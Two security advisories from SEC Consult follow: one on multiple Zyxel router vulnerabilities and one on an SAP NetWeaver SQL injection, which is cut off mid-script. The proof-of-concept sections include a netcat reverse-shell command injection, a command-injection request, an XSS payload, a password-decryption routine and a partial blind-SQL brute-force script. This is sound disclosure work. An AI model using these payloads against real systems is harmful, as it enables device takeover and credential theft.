<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220215-0 ><br />=======================================================================<br /> title: Multiple Critical Vulnerabilities<br /> product: Multiple Zyxel devices<br /> vulnerable version: For affected products see "Solution" section<br /> fixed version: see "Solution" section<br /> CVE number: -<br /> impact: Critical<br /> homepage: https://www.zyxel.com<br /> found: 2020-11-27<br /> by: G. Hechenberger (Office Vienna)<br /> S. Robertz (Office Vienna)<br /> S. Viehböck (Office Vienna)<br /> T. Weber (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br /><br />"Focused on innovation and customer-centricity, Zyxel Communications Corp. has<br />been connecting people to the internet for nearly 30 years. We keep promoting<br />creativity which meets the needs of customers. This spirit has never been<br />changed since we developed the world's first integrated 3-in-1 data/fax/voice<br />modem in 1992. Our ability to adapt and innovate with networking technology<br />places us at the forefront of understanding connectivity for telco/service<br />providers, businesses and home users.<br /><br />We're building the networks of tomorrow, helping unlock the world's potential<br />and meeting the needs of the modern workplace; powering people at work, life<br />and play. We stand side-by-side with our customers and partners to share new<br />approaches to networking that will unleash their abilities. Loyal friend,<br />powerful ally, reliable resource — we are Zyxel, Your Networking Ally."<br /><br />Source: https://www.zyxel.com/about_zyxel/company_overview.shtml<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends Zyxel customers to upgrade the firmware to the latest<br />version available.<br /><br />The collaboration between Zyxel Communications and SEC Consult will further strengthen<br />Zyxel's cybersecurity strategy by accelerating and optimizing the ability to respond<br />to threats and vulnerabilities like those described in this advisory.<br /><br />https://sec-consult.com/blog/detail/zyxel-communications-and-sec-consult-reach-next-level-of-cybersecurity/<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Multiple Unauthenticated Buffer Overflows in zhttpd and libclinkc.so<br />Multiple unauthenticated buffer overflows have been discovered in the zhttpd web<br />server. One buffer overflow is extremely simple to trigger as it occurs in the<br />URI input. In case of an overlong input, the web server crashes as the return<br />address is overwritten with the input values as the function scanf() without<br />length check was used. Multiple other buffer overflows can be found in the fol-<br />lowing functionalities:<br />* URI parsing in libclinkc.so, if '?' is contained.<br />* Export_Log functionality.<br /><br />An attacker can take over the device by using the return-to-zero-protection<br />technique as ASLR in the used Linux kernel is activated system-wide and the NX<br />bit is set for the web server binary. Other protection mechanisms like PIE,<br />stack canaries and relocation read only were not set. The address of libc<br />shifts due to ASLR and must be brute-forced therefore. This can take up to one<br />hour. However, on average, an attacker will gain a root shell in less than<br />30 minutes.<br /><br /><br />2) Unauthenticated Local File Disclosure in zhttpd<br />An endpoint in zhttpd can be used to expose system files including<br />"/etc/passwd" and "/etc/shadow". This endpoint is accessible without prior<br />login. An attacker can read all files on the system by using this endpoint.<br /><br /><br />3) Unsafe Storage of Sensitive Data<br />The device configuration contains passwords stored in a reversible form. Rather<br />than storing passwords in an appropriate cryptographic hash format, the<br />passwords are encrypted with a symmetric cipher (AES) using a static key. An<br />attacker with access to the device configuration (e.g. by exploiting vulnerability<br /> #2) can decrypt the passwords and use them in further attacks.<br /><br /><br />4) Authenticated Command Injection<br />Two command injections were found within the device. One was identified in the<br />ping diagnostic tool, the other one at the certificate upload. Both led to a<br />fully compromised system as the web service was started with root permissions.<br /><br />It is suspected that more command injections are present in the web interface<br />of the device.<br /><br /><br />5) Broken Access Control<br />Various access control vulnerabilities were identified where a lower privileged<br />user can access functionality of a higher privilege role.<br />Some functionality is visible in the GUI only if using a user account with full<br />access permissions. However, it is not visible as standard "admin" user with the<br />role administrator. It can be exploited, e.g., to open ports for system services<br />such as SSH and FTP and also to access other functionality intended to be used<br />by users with full access only.<br /><br /><br />6) Processing of Symbolic Links in ftpd<br />The FTP server on the device processes symbolic links on external storage<br />media, e.g. formatted as NTFS. By creating a symbolic link to the root directory,<br />this can be abused to get read access to the root file system.<br /><br /><br />7) Inadequate CSRF Implementation<br />The web interface provides CSRF tokens, which are implemented as 9-digit<br />numbers and are transmitted as "sessionkey" parameter. CSRF tokens rely on<br />unpredictability to fulfill their function. However, an API endpoint exists on<br />the device, which can be used in an unauthenticated manner to generate and<br />retrieve a new and valid CSRF token value over the internal network.<br /><br /><br />8) Stored Cross-Site Scripting<br />A stored cross-site scripting vulnerability was identified in the printer name<br />field of the print server menu within the web interface of the device. However,<br />the possible payload is limited to 32 characters and certain tags.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Multiple Unauthenticated Buffer Overflows in zhttpd and libclinkc.so<br /><br />URI parsing pseudo code in zhttpd:<br />-------------------------------------------------------------------------------<br />char path [256];<br />[...]<br />__s = (char *)cg_http_request_geturi(param_1);<br />pcVar2 = strstr(__s,"Export_Log");<br />if (pcVar2 != (char *)0x0) {<br />__isoc99_sscanf(__s,"%*[^?]?%s",path);<br />return;<br />}<br />-------------------------------------------------------------------------------<br />This code will copy everything following a '?' from the URI to a 256 byte<br />buffer. As URIs are commonly allowed to contain 2048 characters, the 'path'<br />buffer can be overflown.<br /><br />Proof of concept exploit that will obtain a root shell:<br />-------------------------------------------------------------------------------<br />< the remote root exploit has been removed from this advisory and will be<br /> published at a later date ><br />-------------------------------------------------------------------------------<br /><br />URI handling pseudo code, when '?' is present, in libclinkc.so, which is called<br />from zhttpd:<br />-------------------------------------------------------------------------------<br />char acStack144 [128];<br />pcVar2 = strchr(uri_ptr,'?');<br />if (pcVar2 != (char *)0x0) {<br />memset(acStack144,0,0x80);<br />strncpy(acStack144,uri_ptr,(size_t)(pcVar2 + -(int)uri_ptr));<br />-------------------------------------------------------------------------------<br />This buffer can be overflown even though strncpy is used, as the copy length<br />parameter 'n' is user controlled. The attacker will need to request a URL with<br />more than 128 characters and will then append a '?'.<br /><br /><br />2) Unauthenticated Local File Disclosure in zhttpd<br />The endpoint "Export_Log" can be used to fetch arbitrary files as shown in the<br />following request that accesses the config file "/data/zcfg_config.json":<br />-------------------------------------------------------------------------------<br />< POC removed from this advisory ><br />-------------------------------------------------------------------------------<br /><br />This endpoint is accessible without prior authentication!<br /><br />The file '/data/zcfg_config.json' will contain the running configuration of the<br />router, including all passwords such as SIP credentials!<br /><br /><br />3) Unsafe Storage of Sensitive Data<br />There is a proprietary password format by Zyxel denoted by the prefix<br />"_encrypt_". This is implemented by the function encryptPassword in the binary<br />"/bin/zcmd". Values in the configuration fields named "Privilege", "Password",<br />"DefaultPassword" and "OldDefaultPassword" are passed to a function that<br />derives an AES key using the OpenSSL function EVP_BytesToKey from static data.<br />The following code snippets are a re-implementation of the key derivation<br />algorithm. The key has been removed from this advisory.<br />-------------------------------------------------------------------------------<br />unsigned char salt[] = { 0xXX,0xXX,0xXX,0xXX,0xXX,0xXX,0xXX,0xXX };<br />int encrypt_key_length;<br />char encryptKey[]= "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";<br />encrypt_key_length = strlen(encryptKey);<br />unsigned char key[EVP_MAX_KEY_LENGTH], iv[EVP_MAX_IV_LENGTH];<br />int datal = encrypt_key_length;<br />EVP_BytesToKey(EVP_aes_256_cbc(), EVP_sha1(), (const unsigned char*)salt,<br />(const unsigned char*)encryptKey, datal,5,key,iv);<br />for (int i = 0;i <= EVP_MAX_KEY_LENGTH;i++) {<br />printf("%02X", key[i]);<br />}<br />printf("\n");<br />for (int i = 0;i <= EVP_MAX_IV_LENGTH;i++) {<br />printf("%02X", iv[i]);<br />}<br />-------------------------------------------------------------------------------<br />The input for the key derivation is static, so the resulting key and IV are<br />too. Based on the information the following Python snippet was developed that<br />decrypts password entries (the key has been removed from this advisory):<br />-------------------------------------------------------------------------------<br />def decrypt_zyxel_encrypt(input):<br />key=bytearray.fromhex(<br />'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')<br />iv=bytearray.fromhex('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')<br />input=input.replace('_encrypt_','')<br />decoded = b64decode(input)<br />aes = AES.new(key, AES.MODE_CBC,iv)<br />decrypted=aes.decrypt(decoded)<br />print(repr(decrypted))<br />-------------------------------------------------------------------------------<br />Decrypting the password can be done with the following command:<br /> >> decrypt_zyxel_encrypt('_encrypt_xxxxxxxxxxxxxxxxx==')<br /><br />The same password algorithm was discussed in the context of security research<br />on the Zyxel VMG8825-T50 before:<br />https://th0mas.nl/2020/03/26/getting-root-on-a-zyxel-vmg8825-t50-router/<br /><br /><br />4) Authenticated Command Injection<br />The input vulnerable to command injection can be found in the menu at<br />MENU->Maintenance->Diagnostic. The following payload can now be used in the IP<br />address field to create a reverse shell:<br />127.0.0.1;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc Attacker-IP Attacker-Port >/tmp/f &<br /><br />The second identified possibility for a command injection was the certificate<br />upload. The endpoint is not visible from the UI for a regular user, however<br />due to the broken access control, see 6), every user can interact with it.<br /><br />-------------------------------------------------------------------------------<br />POST /cgi-bin/Certificates?action=import_local&priv=;touch${IFS}foo&sessionkey=409106100 HTTP/1.1<br />Host: <IP><br />Connection: close<br />Content-Length: 1498<br />Content-Type: multipart/form-data; boundary=----<br />WebKitFormBoundarywlxAsQZ1maK9V9E9<br />Accept: */*<br />Origin: https://<IP><br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://<IP>/Certificates<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: Session=uUgQobZKw5cUzesePtCAGhyxH3SOCE8W<br />------WebKitFormBoundarywlxAsQZ1maK9V9E9<br />Content-Disposition: form-data; name="certImportFileName";<br />filename="ZyXELcert.crt"<br />Content-Type: application/pkix-cert<br />-----BEGIN CERTIFICATE-----<br />[...]<br />-----END CERTIFICATE-----<br />------WebKitFormBoundarywlxAsQZ1maK9V9E9—<br />-------------------------------------------------------------------------------<br /><br />5) Broken Access Control<br /><br />As a first example, available user accounts and their privileges can be viewed<br />by sending a request the following API endpoint:<br />https://<IP>/cgi-bin/DAL?oid=login_privilege<br />The response shows usernames invisible in the GUI, here e.g., the "root" user.<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Cache-Control: no-cache<br />Content-Type: application/json<br />Content-Length: 2906<br />Date: Thu, 01 Jan 1970 22:59:49 GMT<br />X-Frame-Options: sameorigin<br />Content-Security-Policy: frame-ancestors 'self'<br />X-Content-Type-Options: nosniff<br />X-XSS-Protection: 1; mode=block<br />{<br />"result": "ZCFG_SUCCESS",<br />"ReplyMsg": "Page",<br />"ReplyMsgMultiLang": "",<br />"Object": [<br />{<br />"Index0": 1,<br />"Index1": 1,<br />"Enabled": true,<br />"Username": "root",<br />"Password": "",<br />"EnableQuickStart": true,<br />"Privilege": "login"<br />},<br />[...]<br />-------------------------------------------------------------------------------<br />As a second example, the status of system services can be viewed by sending a<br />request to the following API endpoint:<br />https://<IP>/cgi-bin/DAL?oid=mgmt_srv<br />The response shows various system services, here e.g., the SSH service which<br />is only open for a trusted domain ("Trust_Dm").<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Cache-Control: no-cache<br />Content-Type: application/json<br />Content-Length: 1271<br />Date: Thu, 01 Jan 1970 02:18:28 GMT<br />X-Frame-Options: sameorigin<br />Content-Security-Policy: frame-ancestors 'self'<br />X-Content-Type-Options: nosniff<br />X-XSS-Protection: 1; mode=block<br />{<br />"result": "ZCFG_SUCCESS",<br />"ReplyMsg": "RestartDeamon",<br />"ReplyMsgMultiLang": "",<br />"Object": [<br />[...]<br />{<br />"Index": 5,<br />"Name": "SSH",<br />"Port": 22,<br />"Mode": "Trust_Dm",<br />"BoundInterfaceList":<br />"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,<br />,,IP.Interface.11,"<br />},<br />[...]<br />-------------------------------------------------------------------------------<br />Subsequently, services can also be opened. An example request to open the FTP,<br />SSH and SNMP ports is given below. The request has to be sent in context of an<br />"admin" user and has to contain a valid "sessionkey" value.<br />-------------------------------------------------------------------------------<br />PUT /cgi-bin/DAL?oid=mgmt_srv&sessionkey=575595380 HTTP/1.1<br />Host: <IP><br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />If-Modified-Since: Thu, 01 Jun 1970 00:00:00 GMT<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 2097<br />Origin: https://<IP><br />Connection: close<br />Referer: https://<IP>/RemoteManagement<br />Cookie: Session=6snfyaikMK5FmMcerni8cJEnzl4IgaFc<br />[<br />{<br />"Index": 1,<br />"Name": "HTTP",<br />"Port": 80,<br />"Mode": "LAN_ONLY",<br />"BoundInterfaceList":<br />"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,<br />,,IP.Interface.11,,,,",<br />"LANEnable": true,<br />"WLANEnable": true,<br />"WANEnable": false,<br />"TrustDmEnable": false,<br />"Protocol": "https",<br />"RestartDeamon": false<br />},<br />{<br />"Index": 2,<br />"Name": "HTTPS",<br />"Port": 443,<br />"Mode": "LAN_TstDm",<br />"BoundInterfaceList":<br />"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,<br />,,IP.Interface.11,,,,",<br />"LANEnable": true,<br />"WLANEnable": true,<br />"WANEnable": false,<br />"TrustDmEnable": true,<br />"Protocol": "https",<br />"RestartDeamon": false<br />},<br />{<br />"Index": 3,<br />"Name": "FTP",<br />"Port": 21,<br />"Mode": "LAN_ONLY",<br />"BoundInterfaceList":<br />"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,<br />,,IP.Interface.11,,,,",<br />"LANEnable": true,<br />"WLANEnable": true,<br />"WANEnable": false,<br />"TrustDmEnable": false,<br />"Protocol": "https",<br />"RestartDeamon": false<br />},<br />{<br />"Index": 4,<br />"Name": "TELNET",<br />"Port": 23,<br />"Mode": "",<br />"BoundInterfaceList":<br />"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,<br />,,IP.Interface.11,,,,",<br />"LANEnable": true,<br />"WLANEnable": true,<br />"WANEnable": false,<br />"TrustDmEnable": false,<br />"Protocol": "https",<br />"RestartDeamon": false<br />},<br />{<br />"Index": 5,<br />"Name": "SSH",<br />"Port": 22,<br />"Mode": "LAN_TstDm",<br />"BoundInterfaceList":<br />"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,<br />,,IP.Interface.11,,,,",<br />"LANEnable": true,<br />"WLANEnable": true,<br />"WANEnable": false,<br />"TrustDmEnable": true,<br />"Protocol": "https",<br />"RestartDeamon": false<br />},<br />{<br />"Index": 6,<br />"Name": "SNMP",<br />"Port": 161,<br />"Mode": "LAN_ONLY",<br />"BoundInterfaceList":<br />"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,<br />,,IP.Interface.11,,,,",<br />"LANEnable": true,<br />"WLANEnable": true,<br />"WANEnable": false,<br />"TrustDmEnable": false,<br />"Protocol": "https",<br />"RestartDeamon": false<br />},<br />{<br />"Index": 7,<br />"Name": "PING",<br />"Port": -1,<br />"Mode": "LAN_TstDm",<br />"BoundInterfaceList":<br />"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,<br />,,IP.Interface.11,,,,",<br />"LANEnable": true,<br />"WLANEnable": true,<br />"WANEnable": false,<br />"TrustDmEnable": true,<br />"Protocol": "https",<br />"RestartDeamon": false,<br />"origport": 443,<br />"otherorigport": 80,<br />"httpport": 80,<br />"httpsport": 443<br />}<br />]<br />-------------------------------------------------------------------------------<br />The response will indicate success and the system will be restarted. Another<br />request to the API endpoint used before to query the service status will list<br />the changed SSH mode, now shown as "LAN_TstDm".<br /><br /><br />6) Processing of Symbolic Links in ftpd<br />A prepared USB stick, formatted as NTFS and containing a link to the root file<br />system (created by executing "ln -s / sysroot") is needed to exploit this vul-<br />nerability.<br /><br />After placing the USB stick in the USB port of the device, it is automatically<br />mounted to the admin user's home directory. By using the access control vulne-<br />rability, described in 6), the FTP port can be opened to allow FTP access via<br />the internal network.<br /><br />After connecting to the FTP service using the "admin" credentials, the mounted<br />USB stick can be accessed and the "sysroot" symbolic link will show the<br />content of the root file system.<br /><br /><br />7) Inadequate CSRF Implementation<br />The following API endpoint can be used without authentication to retrieve a<br />new CSRF token:<br />https://<IP>/changeSessionKey<br />The response contains the new session key, valid for all user accounts. The<br />current one will be invalidated.<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Content-Type: application/json<br />Content-Length: 43<br />Date: Thu, 01 Jan 1970 12:29:50 GMT<br />X-Frame-Options: sameorigin<br />Content-Security-Policy: frame-ancestors 'self'<br />X-Content-Type-Options: nosniff<br />X-XSS-Protection: 1; mode=block<br />[<br />{<br />"SessionKey": 583723980<br />}<br />]<br />-------------------------------------------------------------------------------<br /><br />8) Stored Cross-Site Scripting<br />By browsing to "MENU->Network Setting->USB Service->Print Server", the field<br />"User Defined Printer Name" can be used to place a stored cross-site scripting<br />payload. The following code was used as proof-of-concept:<br /><br />P<img src=x onerror=alert('XSS')><br /><br />In a PUT request, this action looks like the following listing in the proxy:<br />-------------------------------------------------------------------------------<br />PUT /cgi-bin/DAL?oid=print_server&sessionkey=578218320 HTTP/1.1<br />Host: <IP><br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />If-Modified-Since: Thu, 01 Jun 1970 00:00:00 GMT<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 106<br />Origin: <IP><br />Connection: close<br />Cookie: activeMenuID=maintain_settings; activeSubmenuID=log;<br />Session=Fg2kSHIfZW5mhySEY4vJfrElXE4TSLEl<br />{<br />"Enable":false,<br />"IppMake":"PRINTER",<br />"IppDevice":"/dev/printer0",<br />"IppName":"P<img src=x onerror=alert('XSS')>"<br />}<br />-------------------------------------------------------------------------------<br />The printer name will be stored and displayed on the same page, executing the<br />payload.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />Multiple devices are affected. See section "solution" for the list of affected models<br />provided by the vendor including the patched firmware version. All firmware older than<br />those listed are affected.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-01-21 | Contacting vendor via security@zyxel.com.tw. Received confirmation<br /> from Zyxel employee.<br />2021-02-09 | Zyxel confirms vulnerabilities and is working on a fix. Zyxel asks<br /> for more time; extended advisory disclosure date to 2021-05-20.<br />2021-04-09 | Asked for an update.<br />2021-04-13 | Zyxel stated that updates on the issues will be provided soon.<br />2021-04-28 | Phone call with Zyxel. Zyxel contact stated that all issues were<br /> resolved.<br />2021-05-01 | Zyxel stated that a status update will follow in the next weeks.<br />2021-05-19 | Zyxel PSIRT sent a list with feedback to all discovered issues.<br />2021-06-01 | Zyxel PSIRT updated the list and added a patch plan including timing.<br /> Updates the earliest updates on the security issues were scheduled<br /> for Q3 2021.<br />2021-09-02 | Status meeting with Zyxel. The advisory disclosure shifts back to<br /> Q4 2021 due to more affected products.<br />2021-11-07 | Security advisory disclosure plan discussion with Zyxel. Vendor stated<br /> that more products must be internally reviewed. The advisory can be released<br /> in Q1 2022 if no further devices are affected .<br />2022-01-25 | Asking vendor regarding coordinated advisory release date.<br />2022-02-03 | Asking vendor again for a status update.<br />2022-02-07 | Vendor reply that affected models are still being consolidated.<br />2022-02-10 | Received final list of affected models.<br />2022-02-15 | Zyxel publishes their security advisory.<br />2022-02-15 | Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />Install the current version of the firmware for the affected product. According to the<br />vendor, the following firmware versions fix the identified security issues:<br /><br />Affected EOL products (list not necessarily complete) which will not get an update:<br /><br />AMG1302-T11C EOL<br />VMG3925-B10C EOL<br />VMG8924-B10D EOL<br />VMG1312-B10D EOL<br />VMG3312-T20A EOL<br />VMG3625-T20A EOL<br />VMG3925-B10B EOL<br />VMG3925-B10C EOL<br />VMG3925-B30C EOL<br />VMG3926-B10A EOL<br />VMG5313-B10B EOL<br />VMG5313-B30B EOL<br />VMG8623-T50A EOL<br />VMG8823-B10B EOL<br />VMG8823-B30B EOL<br />VMG8823-B50B EOL<br />VMG8823-B60B EOL<br />VMG8924-B10D EOL<br />VMG8924-B30D EOL<br />PMG5317-T20A EOL<br /><br /><br />Affected product Model / Patch availability<br />CPE:<br />DX3301-T0 V5.50(ABVY.3)C0 in Sep. 2022*<br />DX5401-B0 V5.17(ABYO.1)C0*<br />EMG3525-T50B EMEA - V5.50(ABPM.6)C0*<br /> S. America - V5.50(ABSL.0)b12 in Sep. 2022*<br />EMG5523-T50B EMEA - V5.50(ABPM.6)C0*<br /> S. America - V5.50(ABSL.0)b12 in Sep. 2022*<br />EMG5723-T50K V5.50(ABOM.7)C0*<br />EX3301-T0 V5.50(ABVY.3)C0 in Sep. 2022*<br />EX5401-B0 V5.17(ABYO.1)C0*<br />EX5501-B0 V5.17(ABRY.2)C0*<br />LTE3301-PLUS V1.00(ABQU.3)C0*<br />LTE7240-M403 V2.00(ABMG.4)C0*<br />VMG1312-T20B V5.50(ABSB.5)C0*<br />VMG3625-T50B V5.50(ABPM.6)C0*<br />VMG3927-B50A V5.17(ABMT.6)C0*<br />VMG3927-B60A V5.17(ABMT.6)C0*<br />VMG3927-T50K V5.50(ABOM.7)C0*<br />VMG4005-B50A V5.15(ABQA.2)C0 in Mar. 2022*<br />VMG8623-T50B V5.50(ABPM.6)C0*<br />VMG8825-B50A V5.17(ABMT.6)C0*<br />VMG8825-B50B V5.17(ABNY.7)C0*<br />VMG8825-B60A V5.17(ABMT.6)C0*<br />VMG8825-B60B V5.17(ABNY.7)C0*<br />VMG8825-T50K V5.50(ABOM.7)C0*<br />XMG3927-B50A V5.17(ABMT.6)C0*<br />XMG8825-B50A V5.17(ABMT.6)C0*<br /><br />Firewall:<br />VPN2S V1.20(ABLN.2)_00210319C1*<br /><br />ONT:<br />AX7501-B0 V5.17(ABPC.1)C0*<br />EP240P V5.40(ABVH.1)C0 in May 2022*<br />PMG5317-T20B V5.40(ABKI.4)C0 in Apr. 2022*<br />PMG5617GA V5.40(ABNA.2)C0 in Apr. 2022*<br />PMG5622GA V5.40(ABNB.2)C0 in Apr. 2022*<br /><br />WiFi extender:<br />WX3100-T0 V5.50(ABVL.1)C0 in Mar. 2022*<br />WX3401-B0 V5.17(ABVE.1)C0*<br /><br />WiFi system:<br />WSQ50 (Multy X) V2.20(ABKJ.7)C0<br />WSQ60 (Multy Plus) V2.20(ABND.8)C0<br /><br />*Please reach out to your local Zyxel support team for the updated firmware file.<br /><br /><br />For further information, please see the vendor's advisory as well:<br />https://www.zyxel.com/support/Zyxel-security-advisory-for-multiple-vulnerabilities.shtml<br /><br />Page from the vendor regarding affected devices:<br />https://www.zyxel.com/support/Zyxel-security-advisory-for-multiple-vulnerabilities_Products.shtml<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF G. Hechenberger, S. Robertz, S. Viehböck, T. Weber / @2022<br /><br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20211214-0 ><br />==============================================================================<br /> title: Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG<br /> product: SAP Netweaver<br /> vulnerable version: see vulnerable/tested versions section below<br /> fixed version: see solution section below<br /> CVE number: CVE-2021-33701<br /> SAP SNote: 3078312<br /> impact: Critical<br /> CVSS 3.1 Score: 9.1<br /> CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H<br /> homepage: https://www.sap.com/<br /> found: 2021-07-07<br /> by: Raschin Tavakoli (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />==============================================================================<br /><br />Vendor description:<br />-------------------<br />"SAP SE is a German multinational software corporation based in Walldorf,<br />Baden-Württemberg, that develops enterprise software to manage business<br />operations and customer relations. The company is especially known for its ERP<br />software. SAP is the largest non-American software company by revenue, the<br />world's third-largest publicly-traded software company by revenue, and the<br />largest German company by market capitalisation."<br /><br />Source: https://en.wikipedia.org/wiki/SAP<br /><br /><br />Business recommendation:<br />------------------------<br />SAP® released the patch (SNote 3078312) and SEC Consult advises all<br />SAP® customers to update their systems immediately.<br /><br />An in-depth security analysis performed by security professionals is<br />highly advised, as the software may be affected from further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)<br /><br />The IT_WHERE_CLAUSE parameter of the function module<br />IUUC_RECON_RC_COUNT_TABLE_BIG is vulnerable to an ADBC SQL Injection. The<br />function is part of the package CNV_INC_PROCESSING_REMOTE inside the function<br />module group IUUC_REMOTE. It is typically used to count table records in the<br />context of logging table and trigger creations.<br /><br />ADBC is an API for the Native SQL interface of the AS ABAP that is based on<br />ABAP Objects and can be used to pass Native SQL statements to the database<br />interface. ADBC SQL injections are a very serious type of vulnerability as<br />they allow attackers not only to access data directly at the database layer<br />but also to break out of the current client context. Moreover, stacked queries<br />can be used to perform arbitrary read/write commands. All of this leads to<br />full compromise of the SAP application server.<br /><br />As the affected function module is remote enabled, it allows attackers to<br />perform remote attacks via RFC.<br /><br />Note that the vulnerability was originally found by SEC Consult during a<br />research on a system with DMIS in version DMIS 2011_1_731 SP 0013. In this<br />version, the same parameter IT_WHERE_CLAUSE was vulnerable to an ABAP<br />Command Injection.<br /><br />The vulnerability seems to have been fixed insufficiently, leaving behind this<br />ADBC SQL Injection. The advisory can be viewed at the following URL:<br /><br />https://sec-consult.com/vulnerability-lab/advisory/remote-abap-code-injection-in-sap-netweaver/<br /><br /><br />Attack Prerequisites<br />--------------------<br />1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)<br /><br />First prerequisite is the authorization object S_DMIS (SAP SLO Data migration<br />server) with at least the following settings:<br /><br />MBT_PR_ARE: SAP Landscape Transformation<br />MBT_PR_LEV: (not needed to be set)<br />ACTVT: 03 Display<br /><br />Note that it is common practice that authorization objects are (mis)configured<br />with wildcards, which increases the likelihood of exploitation of the vulnerability.<br /><br />Further, authorization to perform function calls (S_RFC) has to be<br />granted for remote exploitation or access to SE37 for local privilege escalation<br /><br />In the majority of cases internal RFC communications are nowadays still found<br />to be unencrypted. This increases the risk that attackers wiretap account<br />passwords. Once such user is hijacked, the attacker has gained all necessary<br />prerequisites for further attacks as described in this advisory.<br /><br /><br />Proof of concept:<br />-----------------<br />1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)<br /><br />Example A: Arbitrary Read<br /><br />As a proof of concept, a script was created to brute force the password hash<br />of the SAP* users in client 000 while authenticated to client 001. This<br />also demonstrates the possibility of breaking out of the current client context.<br />For this example, a boolean based Blind SQL attack was used. In<br />order to get the exploitation to work, an arbitrary existing table has to be<br />specified for the parameter I_TABNAME (in this PoC ZDEMO_SOH was chosen).<br /><br />The following excerpt shows the source code of the script:<br /><br />* ************************************************************************** *<br />#!/usr/bin/env python3<br />from pyrfc import Connection<br />from string import ascii_letters<br /><br />def generate_alphabet():<br /> alph = []<br /> for c in ascii_letters:<br /> alph.append(c)<br /> for i in range(0,10):<br /> alph.append(str(i))<br /> alph.append('+')<br /> alph.append('/')<br /> alph.append('=')<br /> return alph<br /><br />if __name__ == '__main__':<br /> final_str = ""<br /> conn = Connection(ashost="XX.XX.XX.XX", sysnr="00", client= "001",<br /> user= "Peter", passwd="Sap123456", lang='EN')<br /> alph = generate_alphabet()<br /><br /> print("Brute Forcing SAP* password hash in client 000 ...")<br /><br /> for i in range(16, 61):<br /> toggle = 0<br /> for c in alph:<br /> where_clause = ("('" + c +<br /> "' IN (SELECT SUBSTRING(PWDSALTEDHASH," + str(i) +<br /> ",1) from USR02 WHERE BNAME='SAP*' AND 